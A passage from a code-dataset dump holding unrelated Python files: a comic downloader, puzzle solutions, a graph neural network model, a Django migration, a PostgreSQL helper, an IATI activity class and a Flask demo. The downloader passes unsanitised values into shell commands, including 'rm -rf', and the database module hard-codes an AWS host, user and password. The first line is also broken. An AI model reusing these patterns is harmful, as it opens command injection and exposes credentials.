terkecil=kumpulan[0]\n## for i in range(1,n):\n## if kumpulan[i]1 and (sys.argv[1] == '-a' or sys.argv[1] == '--all'):\n print('\\n'.join(library.keys()))\n sys.exit(\"\\n### End Of Library ###\\n\")\n\n if len(sys.argv)>1 and (sys.argv[1] == '-l' or sys.argv[1] == '--list'):\n restrict_list = [name for name in library.keys() if name[0] == sys.argv[2]]\n print('\\n'.join(restrict_list))\n sys.exit(\"\\n### End Of List ###\\n\")\n\n if len(sys.argv)>1 and (sys.argv[1] == '-c' or sys.argv[1] == '--comic'):\n print(str(sys.argv[2]))\n user_input = str(sys.argv[2])\n else:\n user_input = input(\"Which comic would you like to download?\\n\")\n\n url_home_page = library[user_input]\n print(\"Processing...\")\n\n library[user_input]\n try:\n browser = webdriver.Firefox()\n except:\n browser = webdriver.Firefox(executable_path='/path/to/geckodriver')\n\n\n # In[8]:\n\n\n browser.get(url_home_page)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id(\"list\"))\n nb_chapters = browser.find_elements_by_xpath(\"//tbody/tr\")\n\n if len(nb_chapters)>1:\n print('\\nDetected several chapters...')\n input_chapter = input(\"Please specify which one of the following you would like to download.\\nFor example: #2\\n\\n\")\n input_chapter = input_chapter.split('#')[1]\n else:\n input_chapter = \"TPB\"\n\n\n # In[9]:\n print(\"...\")\n\n # url_chapter = browser.find_element_by_xpath(\"//tbody/tr[%i]/td[1]/a\"%input_chapter).get_attribute('href')\n # folder_to_create = browser.find_element_by_xpath(\"//tbody/tr[%i]/td[1]/a\"%input_chapter).text.replace(' ','_')\n url_chapter = url_home_page.replace('comicextra.com/comic','comicextra.com')+'/chapter-'+input_chapter\n folder_to_create = '-'.join(url_chapter.split('/')[-2:])\n\n # In[10]:\n\n\n browser.get(url_chapter)\n WebDriverWait(browser, timeout=20).until(lambda d: d.find_element_by_class_name('label1'))\n\n page_number = int(browser.find_element_by_class_name('label1').text.split(' ')[1])\n\n list_pages = []\n os.system(\"mkdir %s\"%folder_to_create)\n\n for i in range(1,page_number+1):\n if i==1:\n browser.get(url_chapter)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id('main_img'))\n page = browser.find_element_by_id('main_img').get_attribute('src')\n list_pages.append(page)\n print(\"Downloading %s: page %i/%i\"%(folder_to_create,i,page_number))\n os.system(\"wget -q '%s' -O %s/%i.jpeg &> /dev/null\"%(page,folder_to_create,i))\n else:\n browser.get(url_chapter+'/%i'%i)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id('main_img'))\n page = browser.find_element_by_id('main_img').get_attribute('src')\n list_pages.append(page)\n print(\"Downloading %s: page %i/%i\"%(folder_to_create,i,page_number))\n os.system(\"wget -q '%s' -O %s/%i.jpeg &> /dev/null\"%(page,folder_to_create,i))\n browser.quit()\n os.system(\"zip -qr %s.zip %s\"%(folder_to_create,folder_to_create))\n os.system(\"rm -rf geckodriver.log %s/\"%folder_to_create)\n print(\"Download complete - File created: %s.zip\"%folder_to_create)\n\nif __name__ == '__main__':\n main()\n","sub_path":"build/lib/get_comics/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"566358366","text":"import math\n\ndef divisors(n):\n limit = int(math.ceil(math.sqrt(n)))\n lowdivs = filter(lambda x: n%x==0, range(1, limit+1))\n highdivs = [n/d for d in lowdivs]\n alldivs = set(lowdivs + highdivs)\n properdivs = alldivs.difference(set([n]))\n return list(properdivs)\n\ndef amicable(n):\n m = sum(divisors(n))\n k = sum(divisors(m))\n return n == k and n != m\n\ndef solution():\n return sum(filter(amicable, range(1,10000)))\n\nif __name__ == \"__main__\":\n print(solution())\n","sub_path":"src/p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207054659","text":"import operator\nclass Solution(object):\n def findMinHeightTrees(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n if n == 1:\n return 0\n graph = self.buildGraph(n, edges)\n res = []\n for i in range(n):\n res.append((self.calcHeight(i, graph), i))\n res.sort()\n minHeight = res[0][0]\n i = 0\n while i < len(res) and res[i][0] == minHeight:\n i += 1\n return [j[1] for j in res[:i]]\n\n def buildGraph(self, n, edges):\n graph = []\n for i in range(n):\n graph.append([])\n for edge in edges:\n graph[edge[0]].append(edge[1])\n graph[edge[1]].append(edge[0])\n return graph\n\n def calcHeight(self, node, graph):\n queue = []\n queue.append((node, 0))\n i = 0\n marked = [False, ]*len(graph)\n while i < len(queue):\n adjs = graph[queue[i][0]]\n marked[queue[i][0]] = True\n for adj in adjs:\n if not marked[adj]:\n queue.append((adj, queue[i][1]+1))\n i += 1\n queue.sort(key=operator.itemgetter(1), reverse=True)\n return queue[0][1]\n\nif __name__ == \"__main__\":\n s = Solution()\n g = [[3, 0], [3, 1], [3, 2], [3, 4], [5, 4]]\n print(s.findMinHeightTrees(6, g))\n","sub_path":"exercise/leetcode/python_src/by2017_Sep/Leet310.py","file_name":"Leet310.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575059875","text":"\"\"\"\nQGCN model implementation. First there are layers of GCN, then a bilinear layer (the last layer of the QGCN), and then\nthere is the QGCN which have them both.\n\"\"\"\n\nimport json\nfrom torch.nn import Module, Linear, Dropout, Embedding, ModuleList, Sequential, LogSoftmax\nimport torch\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\n\nADAM_ = Adam\nSGD_ = SGD\nrelu_ = torch.relu\nsigmoid_ = torch.sigmoid\ntanh_ = torch.tanh\n\n\n\"\"\"\ngiven A, x0 : A=Adjacency_matrix, x0=nodes_vec\nFirst_model => x1(n x k) = sigma( A(n x n) * x0(n x d) * W1(d x k) )\nBilinear_model => x2(1 x 1) = sigma( W2(1 x k) * trans(x1)(k x n) * A(n x n) * x0(n x d) * W1(d x 1) )\n\"\"\"\n\n\n# class of GCN model\nclass GCN(Module):\n def __init__(self, in_dim, out_dim, activation, dropout):\n super(GCN, self).__init__()\n # useful info in forward function\n self._linear = Linear(in_dim, out_dim)\n self._activation = activation\n self._dropout = Dropout(p=dropout)\n self._gpu = True # turn to True if you have access to gpu\n\n def forward(self, A, x0):\n # Dropout layer\n x0 = self._dropout(x0)\n # tanh( A(n x n) * x0(n x d) * W1(d x k) )\n Ax = torch.matmul(A, x0)\n\n x = self._linear(Ax)\n x1 = self._activation(x) - 2/(x**2+1)\n \n return x1\n \n\n# class of last layer of the QGCN\nclass QGCNLastLayer(Module):\n def __init__(self, left_in_dim, right_in_dim, out_dim):\n super(QGCNLastLayer, self).__init__()\n # useful info in forward function\n self._left_linear = Linear(left_in_dim, 1)\n self._right_linear = Linear(right_in_dim, out_dim)\n self._gpu = False\n\n def forward(self, A, x0, x1):\n x1_A = torch.matmul(x1.permute(0, 2, 1), A)\n W2_x1_A = self._left_linear(x1_A.permute(0, 2, 1))\n W2_x1_A_x0 = torch.matmul(W2_x1_A.permute(0, 2, 1), x0)\n W2_x1_A_x0_W3 = self._right_linear(W2_x1_A_x0)\n return W2_x1_A_x0_W3.squeeze(dim=1)\n\n\n# final model of QGCN\nclass QGCN(Module):\n \"\"\"\n first linear layer is executed numerous times\n \"\"\"\"\"\n\n def __init__(self, params, in_dim, embed_vocab_dim):\n super(QGCN, self).__init__()\n self._params = params[\"model\"] if type(params) is dict else json.load(open(params, \"rt\"))[\"model\"]\n\n # add embedding layers if needed, also is the data binary or not\n self._is_binary = True if self._params[\"label_type\"] == \"binary\" else False\n self._is_embed = True if self._params[\"use_embeddings\"] == \"True\" else False\n\n # dimensions of the GCN layers according to the params json file\n qgcn_layers_dim = [{\"in\": layer[\"in_dim\"], \"out\": layer[\"out_dim\"]} for layer in self._params[\"GCN_layers\"]]\n qgcn_layers_dim[0][\"in\"] = in_dim\n\n # if embedding is given there are also layer for the embedding\n if self._is_embed:\n # embeddings are added to ftr vector -> update dimensions of relevant weights\n qgcn_layers_dim[0][\"in\"] += sum(self._params[\"embeddings_dim\"])\n\n # add embedding layers\n self._embed_layers = []\n for vocab_dim, embed_dim in zip(embed_vocab_dim, self._params[\"embeddings_dim\"]):\n self._embed_layers.append(Embedding(vocab_dim, embed_dim))\n self._embed_layers = ModuleList(self._embed_layers)\n \n values_out = [qgcn_layers_dim[i][\"out\"] for i in range(len(qgcn_layers_dim))]\n values_out.append(qgcn_layers_dim[0][\"in\"])\n sum_layers_shape = sum(values_out)\n\n self._num_layers = len(self._params[\"GCN_layers\"])\n self._linear_layers = []\n # create linear layers\n self._linear_layers = ModuleList([GCN(qgcn_layers_dim[i][\"in\"], qgcn_layers_dim[i][\"out\"],\n globals()[self._params[\"activation\"]], self._params[\"dropout\"])\n for i in range(self._num_layers)])\n \n # W2_x1_A_x0_W3 where x1 is the last layer of GCN and x0 is the input layer (what we have done in our experiments)\n if self._params[\"f\"] == \"x1_x0\":\n qgcn_right_in = in_dim + sum(self._params[\"embeddings_dim\"])\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n # W2_x1_A_x1_W3 where x1 is the last layer of GCN\n elif self._params[\"f\"] == \"x1_x1\":\n qgcn_right_in = qgcn_layers_dim[-1][\"out\"]\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n # W2_c_A_x0_W3 where c is the concatanation of all layers of GCN andx1 is the last layer of GCN\n elif self._params[\"f\"] == \"c_x1\":\n qgcn_right_in = qgcn_layers_dim[-1][\"out\"]\n qgcn_left_in = sum_layers_shape\n # if invalid value is inserted, do the regular version - \"x1_x0\"\n else:\n qgcn_right_in = in_dim + sum(self._params[\"embeddings_dim\"])\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n \n self._qgcn_last_layer = QGCNLastLayer(left_in_dim=qgcn_left_in, right_in_dim=qgcn_right_in,\n out_dim=1 if self._is_binary else self._params[\"num_classes\"])\n \n self._softmax = LogSoftmax(dim=1)\n self.optimizer = self.set_optimizer(self._params[\"lr\"], globals()[self._params[\"optimizer\"]], self._params[\"L2_regularization\"])\n\n def set_optimizer(self, lr, opt, weight_decay):\n return opt(self.parameters(), lr=lr, weight_decay=weight_decay)\n\n def _fix_shape(self, input):\n return input if len(input.shape) == 3 else input.unsqueeze(dim=0)\n\n def forward(self, A, x0, embed):\n if self._is_embed:\n list_embed = []\n for i, embedding in enumerate(self._embed_layers):\n list_embed.append(embedding(embed[:, :, i]))\n x0 = torch.cat([x0] + list_embed, dim=2)\n\n x1 = x0\n H_layers = [x1]\n for i in range(self._num_layers):\n x1 = self._linear_layers[i](A, x1)\n H_layers.append(x1)\n\n c = torch.cat(H_layers, dim=2)\n\n if self._params[\"f\"] == \"x1_x0\":\n x2 = self._qgcn_last_layer(A, x0, x1)\n elif self._params[\"f\"] == \"x1_x1\":\n x2 = self._qgcn_last_layer(A, x1, x1)\n elif self._params[\"f\"] == \"c_x1\":\n x2 = self._qgcn_last_layer(A, x1, c)\n else: # like \"x1_x0\"\n x2 = self._qgcn_last_layer(A, x0, x1)\n\n x2 = torch.sigmoid(x2) if self._is_binary else self._softmax(x2)\n return x2\n","sub_path":"QGCN/QGCN_model/QGCN.py","file_name":"QGCN.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460642058","text":"import tensorflow as tf\ntf.enable_eager_execution()\nfrom tensorflow import keras\nfrom keras import losses\nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"\nfrom Data import getX, getY, getFalseX, getFalseY\n\ntrain_arrays = getX(0, True)\ntrain_labels = getY(0, True)\ntrain_labels = train_labels.reshape((-1, 1))\n\"\"\"\ntrain_arrays = np.array([\n [1, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 1],\n [0, 0, 0],\n [0, 1, 1],\n [0, 1, 1],\n [1, 0, 1],\n [0, 1, 0],\n [0, 0, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 0],\n [0, 1, 0]\n ])\n\ntrain_labels = np.array([\n 1,\n 0,\n 1,\n 1,\n 0,\n 0,\n 1,\n 1,\n 1,\n 1,\n 0,\n 0,\n 0,\n 1,\n 0,\n 0,\n 0,\n 1,\n 1,\n 0\n ]).T\n\n\ntrain_arrays = train_arrays.astype(int)\ntrain_labels = train_labels.astype(int)\n\n\nepochs = 6\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(),\n #keras.layers.Dense(3200, activation=tf.nn.relu),\n #keras.layers.Dropout(.2),\n #keras.layers.Dense(160, activation=tf.nn.relu),\n #keras.layers.Dropout(.2),\n keras.layers.Dense(4, activation=tf.nn.relu),\n keras.layers.Dropout(.2),\n keras.layers.Dense(2, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nval_arrays = np.array([\n [0, 0, 0],\n [1, 1, 1],\n [1, 0, 1],\n [0, 1, 1],\n [0, 0, 1],\n [1, 1, 0],\n [1, 0, 0],\n [0, 1, 0]\n])\n\nval_labels = np.array([\n 0,\n 1,\n 1,\n 0,\n 0,\n 1,\n 1,\n 0\n]).T\n\ntrain = model.fit(train_arrays, train_labels, validation_data=(val_arrays, val_labels),\n epochs=epochs, verbose=2, shuffle=True, batch_size=20)\n\n\nhistory_dict = train.history\nprint(history_dict.keys())\n\nacc = np.array(history_dict['acc'])\nloss = np.array(history_dict['loss'])\n\n\nepochs = range(1, len(acc) + 1)\n\nplt.plot(epochs, acc, 'r', label='Training Accuracy')\nplt.plot(epochs, loss, 'b', label='Training Loss')\nplt.title(\"Training Accuracy and Loss\")\nplt.xlabel(\"Epochs\")\n\nplt.show()\n\n\"\"\"\ntrain_arrays = tf.cast(train_arrays, tf.float32)\ntrain_labels = tf.cast(train_labels, tf.float32)\n\ntf.print(train_arrays)\ntf.print(train_labels)\n\ntf.print(train_arrays)\ntf.print(train_labels)\n# Prints normalized data, in a long list\ntf.print(str(train_arrays))\ntf.print(str(train_labels))\n\nepochs = 20\nsteps_per_epoch = 1\n\n\ndataset = tf.data.Dataset.from_tensor_slices((train_arrays, train_labels)) # .repeat(count=3)\n\n\n\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(),\n keras.layers.Dense(6, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(),\n loss=losses.binary_crossentropy,\n metrics=['accuracy'])\n\ntrain = model.fit(dataset, steps_per_epoch=steps_per_epoch, epochs=epochs, verbose=2, shuffle=True)\n\n\n\n\nhistory_dict = train.history\nhistory_dict.keys()\n\nacc = history_dict['acc']\nloss = history_dict['acc']\n\n\nplt.plot(epochs, acc, 'r', label='Training Accuracy')\nplt.plot(epochs, loss, 'b', label='Training Loss')\nplt.title(\"Training Accuracy and Loss\")\nplt.xlabel(\"Epochs\")\n\nplt.show()\n\n\"\"\"\n","sub_path":"venv/Code/UpdateofOldProject.py","file_name":"UpdateofOldProject.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"201489218","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 6 17:07:05 2018\n\n@author: Oliver\n\"\"\"\n\n#s = \"abc\"\n#print(s[0:2])\n\nan_letters = \"aefhilmnorsxAEFHILMNORSX\"\nword = input(\"I will cheer for you! Enter a word: \")\ntimes = int(input(\"Enthusiasm level (1-10): \"))\n\nfor char in word:\n if char in an_letters:\n print(\"Give me an \" + char + \"! \" + char)\n else:\n print(\"Give me a \" + char + \"! \" + char)\n \nprint(\"What does that spell?\")\nfor i in range(times):\n print(word, \"!!!\")\n\n\n","sub_path":"Lecture_Notes/L3.py","file_name":"L3.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482767845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0002_auto_20160115_0857'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='myuser',\n options={'verbose_name_plural': 'users'},\n ),\n migrations.AddField(\n model_name='myuser',\n name='avatar',\n field=models.ImageField(default=b'static/default_avatar.png', upload_to=b'static/', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='myuser',\n name='phone',\n field=models.CharField(default=b'', max_length=20, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='myuser',\n name='skype',\n field=models.CharField(default=b'', max_length=20, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"accounts/migrations/0003_auto_20160115_1645.py","file_name":"0003_auto_20160115_1645.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"110560710","text":"from Vitals import *\nimport postgresql.driver as driver\nimport postgresql\n\ndef connectAWS():\n aws = driver.connect(user = 'recondbmaster', password = '6g549xt2ydu12', host = 'recondb.cz9q37pduulj.us-west-2.rds.amazonaws.com', port = 5432, database = 'Recon')\n return aws\n\n#Adds generic summoner (i.e. not Master or Challenger tier) to database\ndef addSumm(db, id, tier, div, region):\n\n insert = db.prepare(\n '''\n INSERT INTO \"summoners\"(id, name, tier, division, region, matches) VALUES ($1, NULL, $2, $3, $4, NULL);\n '''\n )\n\n insert(id, tier, div, region)\n db.close()\n\n#Returns list of all summoner IDs\ndef getSumms(db):\n summList = []\n\n get = db.prepare('''\n SELECT id FROM \"summoners\";\n ''')\n raw = get()\n for each in raw:\n summList.append(each['id'])\n return summList\n\ndef getSummsFromTier(db,tier):\n summList = []\n\n get = db.prepare('''\n SELECT * FROM \"summoners\"\n WHERE tier = $1\n ORDER BY oid;\n ''')\n raw = get(tier)\n for each in raw:\n summList.append(each['id'])\n return summList\n\n#Returns list of all match IDs\ndef getMatches(db):\n matchList = []\n\n get = db.prepare('''\n SELECT id FROM \"matches\"\n ORDER BY oid;\n ''')\n raw = get()\n for each in raw:\n matchList.append(each['id'])\n return matchList\n\n#Adds match to database\ndef addMatch(db, id, tier, patch, data):\n\n insert = db.prepare('''\n INSERT INTO \"matches\"(id, tier, patch, data) VALUES ($1, $2, $3, $4);\n ''')\n\n insert(id, tier, patch, data)\n\n#Checks to see if given match is already recorded in database\ndef checkMatchExists(db, id):\n\n select = db.prepare(\n '''\n SELECT * FROM \"matches\"\n WHERE id = $1\n LIMIT 1;\n '''\n )\n\n a = select(id)\n if not a: return False\n else: return True\n\n#Checks to see if given summoner is already recorded in database\ndef checkSummExists(db, id):\n select = db.prepare(\n '''\n SELECT * FROM \"summoners\"\n WHERE id = $1\n LIMIT 1;\n '''\n )\n\n a = select(id)\n if not a: return False\n else: return True\n\n#Returns all data for given MatchID\ndef getMatch(db, id):\n select = db.prepare(\n '''\n SELECT * FROM \"matches\"\n WHERE id = $1 LIMIT 1;\n '''\n )\n\n match = select(id)[0]\n return match\n\ndef getSummTier(db, id):\n getter = db.prepare('''\n SELECT tier FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n tier = getter(id)[0]['tier']\n return tier\n\ndef getSummDiv(db, id):\n getter = db.prepare('''\n SELECT division FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n div = getter(id)[0]['division']\n return div\n\ndef getSummMatches(db, id):\n getter = db.prepare('''\n SELECT matches FROM \"summoners\"\n WHERE id = $1\n LIMIT 1;\n ''')\n matchList = getter(id)[0]['matches']\n return matchList\n\ndef deleteSummsNotSolo(db):\n allSumms = []\n allRanks = []\n\n getter = db.prepare('''\n SELECT * from \"summoners\";\n ''')\n\n setter = db.prepare('''\n UPDATE \"summoners\"\n SET tier = $1\n WHERE id = $2;\n ''')\n\n deleter = db.prepare('''\n DELETE FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n raw = getter()\n for each in raw:\n flag = False\n url = \"https://na.api.pvp.net/api/lol/na/v2.5/league/by-summoner/\" + each['id'] + \"?api_key=\" + KEY\n response = getURL(url)\n if response != None:\n response = response.json()\n for league in response[each['id']]:\n if league['queue'] == \"RANKED_SOLO_5x5\":\n setter(league['tier'], each['id'])\n flag = True\n if flag == False:\n print(\"Deleting: \" + each['id'])\n deleter(each['id'])\n\ndef temp(db):\n db = connectLocal()\n\n update = db.prepare('''\n UPDATE \"summoners\"\n SET matches = $1\n WHERE id = $2\n ''')\n\n for each in allMatches:\n raw = getMatch(each)\n players = []\n stats = json.loads(raw['data'])\n for each2 in stats['participantIdentities']:\n players.append(each2['player']['summonerId'])\n for each3 in players:\n matchList = json.loads(getSummMatches(db,str(each3)))\n if each not in matchList:\n matchList.append(each)\n update(json.dumps(matchList), str(each3))\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"107396299","text":"from collections import defaultdict\nfrom typing import Dict, List, Tuple\n\nimport config\n\n\nACTIVE = '#'\n\n\ndef iterate_conway_cubes(zeroeth_layer: List[str]) -> Dict[Tuple[int], int]:\n \"\"\"Iterate 6 cycles for Conway Cubes.\n\n Args:\n zeroeth_layer (List[str]): the zeroeth layer with cubes\n\n \"\"\"\n cube = defaultdict(int)\n offset = len(zeroeth_layer) // 2\n for y, line in enumerate(zeroeth_layer):\n y += offset\n for x, char in enumerate(line):\n x -= offset\n if char == ACTIVE:\n cube[(x, y)] += 1\n cube[(x, y)] %= 2\n\n return cube\n\n\ndef main() -> None:\n \"\"\"Simulate cycles for Conway Cubes.\"\"\"\n test_answer = 112\n file = config.TestFile(test_answer)\n test = iterate_conway_cubes(file.contents)\n file.test(test)\n\n file = config.File()\n result = iterate_conway_cubes(file.contents)\n config.LOGGER.info(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2020/17/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"585795655","text":"# -*- coding: utf-8 -*-\nfrom iati.calculatesplits import CalculateSplits\nfrom iati.lookups import Lookups\nfrom iati.transaction import Transaction\n\n\nclass Activity:\n def __init__(self, dactivity):\n \"\"\"\n Use the get_activity static method to construct\n \"\"\"\n self.dactivity = dactivity\n self.identifier = dactivity.identifier\n # Get the reporting-org and C19 strictness at activity level\n self.org = Lookups.get_org_info(dactivity.reporting_org, reporting_org=True)\n self.strict = self.is_strict()\n self.humanitarian = dactivity.humanitarian\n # Figure out default country or region/sector percentage splits at the activity level\n self.countryregion_splits = CalculateSplits.make_country_or_region_splits(dactivity)\n self.sector_splits = CalculateSplits.make_sector_splits(dactivity)\n self.transactions = list()\n\n def add_transactions(self, configuration):\n skipped = 0\n for dtransaction in self.dactivity.transactions:\n transaction = Transaction.get_transaction(configuration, dtransaction)\n if not transaction:\n skipped += 1\n continue\n self.transactions.append(transaction)\n return skipped\n\n @staticmethod\n def get_activity(configuration, dactivity):\n \"\"\"\n We exclude activities from secondary reporters and certain sorts\n of organisations where the data is very poor quality. We also\n exclude hierarchy=1 activities for UNDP (XM-DAC-41114) and FCDO (GB-GOV-1).\n \"\"\"\n # Skip activities from a secondary reporter\n if dactivity.secondary_reporter:\n return None, len(dactivity.transactions)\n reporting_org_ref = dactivity.reporting_org.ref\n # Filter out certain orgs\n if Lookups.is_filter_reporting_orgs(reporting_org_ref):\n return None, len(dactivity.transactions)\n # Filter out eg. UNDP and DFID activities that have children (i.e. filter out h=1)\n if Lookups.is_filter_reporting_orgs_children(reporting_org_ref):\n if '2' in dactivity.related_activities_by_type:\n return None, len(dactivity.transactions)\n activity = Activity(dactivity)\n skipped = activity.add_transactions(configuration)\n return activity, skipped\n\n def is_strict(self):\n return True if (Lookups.checks.has_desired_scope(self.dactivity.humanitarian_scopes) or Lookups.checks.has_desired_tag(self.dactivity.tags) or\n Lookups.checks.has_desired_sector(self.dactivity.sectors) or Lookups.checks.is_desired_narrative(self.dactivity.title.narratives)) \\\n else False\n\n def sum_transactions_by_type(self):\n totals = dict()\n for transaction in self.transactions:\n key = f'{transaction.get_direction()} {transaction.get_classification()}'\n totals[key] = totals.get(key, 0) + transaction.value\n return totals\n\n def factor_new_money(self):\n #\n # Figure out how to factor new money\n #\n\n # Total up the 4 kinds of transactions (with currency conversion to USD)\n totals = self.sum_transactions_by_type()\n\n # Figure out total incoming money (never less than zero)\n incoming = max(totals.get('incoming commitments', 0), totals.get('incoming spending', 0))\n if incoming < 0:\n incoming = 0\n\n # Factor to apply to outgoing commitments for net new money\n if incoming == 0:\n self.commitment_factor = 1.0\n else:\n outgoing_commitments = totals.get('outgoing commitments', 0)\n if outgoing_commitments > incoming:\n self.commitment_factor = (outgoing_commitments - incoming) / outgoing_commitments\n else:\n self.commitment_factor = 0.0\n\n # Factor to apply to outgoing spending for net new money\n if incoming == 0:\n self.spending_factor = 1.0\n else:\n spending = totals.get('outgoing spending', 0)\n if spending > incoming:\n self.spending_factor = (spending - incoming) / spending\n else:\n self.spending_factor = 0.0\n\n def add_to_flows(self, out_flows, transaction, funder, implementer):\n if transaction.get_classification() != 'spending':\n return\n provider, receiver = transaction.get_provider_receiver()\n if funder and provider['name'] == Lookups.default_org_name:\n provider = funder\n if implementer and receiver['name'] == Lookups.default_org_name:\n receiver = implementer\n org_name = self.org['name']\n if org_name != Lookups.default_org_name and org_name != provider['name'] and org_name != receiver['name']:\n provider_name = provider['name']\n if (not provider_name or provider_name == Lookups.default_org_name) and provider['id']:\n provider_name = provider['id']\n receiver_name = receiver['name']\n if (not receiver_name or receiver_name == Lookups.default_org_name) and receiver['id']:\n receiver_name = receiver['id']\n key = self.org['name'], provider_name, receiver_name,\\\n transaction.is_humanitarian, transaction.is_strict, transaction.get_direction()\n # ignore internal transactions or unknown reporting orgs\n cur_output = out_flows.get(key, dict())\n cur_output['value'] = cur_output.get('value', 0) + transaction.value\n if 'row' not in cur_output:\n cur_output['row'] = [self.org['id'], self.org['name'], self.org['type'], provider['id'],\n provider_name, provider['type'], receiver['id'], receiver_name,\n receiver['type'], transaction.is_humanitarian, transaction.is_strict,\n transaction.get_direction()]\n out_flows[key] = cur_output\n\n def generate_split_transactions(self, out_transactions, transaction):\n # Make the splits for the transaction (default to activity splits)\n country_splits = transaction.make_country_or_region_splits(self.countryregion_splits)\n sector_splits = transaction.make_sector_splits(self.sector_splits)\n\n # Apply the country and sector percentage splits to the transaction\n # generate multiple split transactions\n for country, country_percentage in country_splits.items():\n for sector, sector_percentage in sector_splits.items():\n\n sector_name = Lookups.get_sector_group_name(sector)\n country_name = Lookups.get_country_region_name(country)\n\n #\n # Add to transactions\n #\n\n total_money = int(round(transaction.value * country_percentage * sector_percentage))\n net_money = int(round(transaction.net_value * country_percentage * sector_percentage))\n\n if total_money != 0:\n # add to transactions\n out_transactions.append([transaction.year_month, self.org['id'], self.org['name'], self.org['type'],\n sector_name, country_name, transaction.is_humanitarian,\n transaction.is_strict, transaction.get_classification(), self.identifier,\n net_money, total_money])\n\n def get_funder_implementer(self):\n funder = None\n implementer = None\n participating_orgs_by_role = self.dactivity.participating_orgs_by_role\n for role in participating_orgs_by_role:\n if role not in ('1', '4'):\n continue\n participating_orgs = participating_orgs_by_role[role]\n if len(participating_orgs) != 1:\n continue\n org = Lookups.get_org_info(participating_orgs[0])\n if role == '1':\n funder = org\n else:\n implementer = org\n return funder, implementer\n\n def process(self, today_year_month, out_flows, out_transactions):\n self.factor_new_money()\n #\n # Walk through the activity's transactions one-by-one, and split by country/sector\n #\n funder, implementer = self.get_funder_implementer()\n skipped = 0\n for transaction in self.transactions:\n if not transaction.process(today_year_month, self):\n skipped += 1\n continue\n self.add_to_flows(out_flows, transaction, funder, implementer)\n if transaction.net_value is None:\n skipped += 1\n continue\n self.generate_split_transactions(out_transactions, transaction)\n return skipped","sub_path":"iati/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67028034","text":"import os\n\nimport werkzeug\nfrom flask import render_template, Flask, abort\nfrom flask_demo.views import blueprint_demo\nfrom logging.config import dictConfig\n\n# 配置日志\nfrom flask_demo.views.class_view_demo import ClassViewAPI\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nprint(BASE_DIR)\nlog_dir = os.path.join(BASE_DIR, 'logs/debug.log')\nprint(log_dir)\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {\n # 'wsgi': {\n # 'class': 'logging.StreamHandler',\n # 'stream': 'ext://flask.logging.wsgi_errors_stream',\n # 'formatter': 'default'\n # },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': log_dir,\n 'formatter': 'default',\n },\n },\n 'root': {\n 'level': 'INFO',\n 'handlers': ['file']\n }\n})\n\n# 声明Flask对象\napp = Flask(__name__)\napp.register_blueprint(blueprint_demo.bp)\n\n\n# 基本函数视图\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template('template_demo.html', name=name)\n\n\n# 错误处理\n@app.errorhandler(404)\ndef 